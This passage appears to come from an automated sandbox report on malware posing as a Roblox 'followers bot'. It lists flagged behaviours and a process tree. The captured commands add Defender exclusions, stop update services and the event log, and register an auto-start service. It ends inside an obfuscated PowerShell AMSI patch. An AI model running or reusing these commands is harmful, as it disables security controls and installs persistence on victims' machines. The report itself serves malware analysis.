| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskhostw.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ff9a64a46f8,0x7ff9a64a4708,0x7ff9a64a4718
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5064 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x320
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x120,0x288,0x7ff645495460,0x7ff645495470,0x7ff645495480
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4968 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\followersbot\" -ad -an -ai#7zMap30093:86:7zEvent16032
C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "HIUOFKBL"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "HIUOFKBL" binpath= "C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "HIUOFKBL"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hVgsrERefJVIGM,[Parameter(Position=1)][Type]$PtfHVZUDZd)$rcUIbefiASF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'flec'+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rcUIbefiASF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$rcUIbefiASF.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$PtfHVZUDZd,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $rcUIbefiASF.CreateType();}$haMKgsdSFTRfD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$miJwkyurBBmZzv=$haMKgsdSFTRfD.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MCEMcUxEndYtGJnfutR=QhImxjyKWUtT @([String])([IntPtr]);$WWvOXsWMgytOsqhnblTFBk=QhImxjyKWUtT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JNnwUqbiAGV=$haMKgsdSFTRfD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$MpDQEUBzVmeZsX=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$WisoKjmviHUuuPssW=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NylEZcZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MpDQEUBzVmeZsX,$MCEMcUxEndYtGJnfutR).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$bZcmgaFQgxxEqstMP=$miJwkyurBBmZzv.Invoke($Null,@([Object]$NylEZcZ,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$stXJLHeppg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,4,[ref]$stXJLHeppg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bZcmgaFQgxxEqstMP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,0x20,[ref]$stXJLHeppg);[Reflec